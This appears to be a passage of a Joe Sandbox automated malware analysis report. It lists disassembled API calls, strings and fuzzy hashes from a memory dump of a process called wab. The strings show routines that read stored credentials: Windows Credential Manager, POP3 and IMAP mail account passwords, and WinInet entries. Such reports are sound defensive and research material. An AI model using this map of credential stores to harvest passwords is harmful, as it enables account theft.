                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                    • DestroyMenu.USER32(00000000), ref: 004095A7
                    • sprintf.MSVCRT ref: 004095EB
                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                    • memset.MSVCRT ref: 0040961C
                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                    • DestroyWindow.USER32(00000000), ref: 0040965C
                    Similarity
                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                    • String ID: caption$dialog_%d$menu_%d
                    • API String ID: 3259144588-3822380221
                    APIs
                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                    • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    Similarity
                    • API ID: AddressProc$Library$FreeLoad
                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                    • API String ID: 2449869053-4258758744
                    APIs
                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • memset.MSVCRT ref: 0040F84A
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                    • LocalFree.KERNEL32(?), ref: 0040F92C
                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    Similarity
                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                    • String ID: Creds$ps:password
                    • API String ID: 551151806-1872227768
                    APIs
                    • wcsstr.MSVCRT ref: 0040426A
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                    • _mbscpy.MSVCRT ref: 004042D5
                    • _mbscpy.MSVCRT ref: 004042E8
                    • strchr.MSVCRT ref: 004042F6
                    • strlen.MSVCRT ref: 0040430A
                    • sprintf.MSVCRT ref: 0040432B
                    • strchr.MSVCRT ref: 0040433C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                    • String ID: %s@gmail.com$www.google.com
                    • API String ID: 3866421160-4070641962
                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                    APIs
                    • _mbscpy.MSVCRT ref: 00409749
                    • _mbscpy.MSVCRT ref: 00409759
                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                    • _mbscpy.MSVCRT ref: 004097A1
                    • memset.MSVCRT ref: 004097BD
                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                    • String ID: TranslatorName$TranslatorURL$general$strings
                    • API String ID: 1035899707-3647959541
                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                    • API String ID: 2360744853-2229823034
                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                    APIs
                    • strchr.MSVCRT ref: 004100E4
                    • _mbscpy.MSVCRT ref: 004100F2
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                    • _mbscpy.MSVCRT ref: 00410142
                    • _mbscat.MSVCRT ref: 0041014D
                    • memset.MSVCRT ref: 00410129
                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                      • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                    • memset.MSVCRT ref: 00410171
                    • memcpy.MSVCRT ref: 0041018C
                    • _mbscat.MSVCRT ref: 00410197
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                    • String ID: \systemroot
                    • API String ID: 912701516-1821301763
                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$strlen
                    • String ID: -journal$-wal$immutable$nolock
                    • API String ID: 2619041689-3408036318
                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                    APIs
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • wcslen.MSVCRT ref: 0040874A
                    • _wcsncoll.MSVCRT ref: 00408794
                    • memset.MSVCRT ref: 0040882A
                    • memcpy.MSVCRT ref: 00408849
                    • wcschr.MSVCRT ref: 0040889F
                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                    • String ID: J$Microsoft_WinInet
                    • API String ID: 2203907242-260894208
                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                    APIs
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    • _mbscpy.MSVCRT ref: 00409686
                    • _mbscpy.MSVCRT ref: 00409696
                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 888011440-2039793938
                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                    APIs
                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                    • strchr.MSVCRT ref: 0040327B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringstrchr
                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                    • API String ID: 1348940319-1729847305
                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                    APIs
                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                      • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                    • strchr.MSVCRT ref: 0040371F
                    • _mbscpy.MSVCRT ref: 00403748
                    • _mbscpy.MSVCRT ref: 00403758
                    • strlen.MSVCRT ref: 00403778
                    • sprintf.MSVCRT ref: 0040379C
                    • _mbscpy.MSVCRT ref: 004037B2
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                    • String ID: %s@gmail.com
                    • API String ID: 500647785-4097000612
                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                    APIs
                    • memset.MSVCRT ref: 004094C8
                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                    • memset.MSVCRT ref: 0040950C
                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                    • _strcmpi.MSVCRT ref: 00409531
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                    • String ID: sysdatetimepick32
                    • API String ID: 3411445237-4169760276
                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                    APIs
                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                    • GetSysColor.USER32(0000000F), ref: 0040B472
                    • DeleteObject.GDI32(?), ref: 0040B4A6
                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteImageLoadObject$Color
                    • String ID:
                    • API String ID: 3642520215-0
                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                    • GetDC.USER32(00000000), ref: 004072FB
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                    • String ID:
                    • API String ID: 1999381814-0
                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                    • API String ID: 1297977491-3883738016
                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                    APIs
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                    • memcpy.MSVCRT ref: 0044972E
                    • memcpy.MSVCRT ref: 0044977B
                    • memcpy.MSVCRT ref: 004497F6
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                    • memcpy.MSVCRT ref: 00449846
                    • memcpy.MSVCRT ref: 00449887
                    • memcpy.MSVCRT ref: 004498B8
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: __aulldvrm$__aullrem
                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                    • API String ID: 643879872-978417875
                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                    • memset.MSVCRT ref: 004058C3
                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                    • SetFocus.USER32(?), ref: 00405976
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                    APIs
                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                    • _mbscat.MSVCRT ref: 0040A8FF
                    • sprintf.MSVCRT ref: 0040A921
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite_mbscatsprintfstrlen
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 1631269929-4153097237
                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                    APIs
                    • memset.MSVCRT ref: 0040810E
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                    • String ID: POP3_credentials$POP3_host$POP3_name
                    • API String ID: 524865279-2190619648
                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetstrchr
                    • String ID: 0$6
                    • API String ID: 2300387033-3849865405
                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$memsetsprintf
                    • String ID: %s (%s)
                    • API String ID: 3756086014-1363028141
                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf
